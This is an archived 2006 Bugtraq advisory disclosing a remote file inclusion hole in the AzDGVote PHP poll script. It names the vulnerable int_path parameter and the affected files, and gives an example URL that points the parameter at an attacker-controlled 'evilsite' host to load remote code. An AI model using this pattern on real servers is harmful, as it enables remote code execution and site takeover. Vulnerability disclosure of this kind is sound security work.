[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060411220320.2255.qmail@securityfocus.com>
Date: 11 Apr 2006 22:03:20 -0000
From: selfar2002@...mail.com
To: bugtraq@...urityfocus.com
Subject: AzDGVote File inclusion
AzDGVote File inclusion
---------------------------------
Site:http://www.azdg.com/
Demo:http://www.azdg.com/scripts/AzDGVote/vote.php?id=1
---------------------------------------
File inclusion
include $int_path."/AzDG.template.inc.php";
int_path parameter File inclusion
Aut File
vote.php,view.php,admin.php
and /admin/index.php
---------------------------------------
example
http://victim.com/poll/view.php?int_path=http://evilsite
-----------------------------------------
Discovered By SnIpEr_SA
E-mail:selfar2002@...mail.com,SnIpEr_SA@...mail.org
Site: www.3asfh.com www.lezr.com
Powered by blists - more mailing lists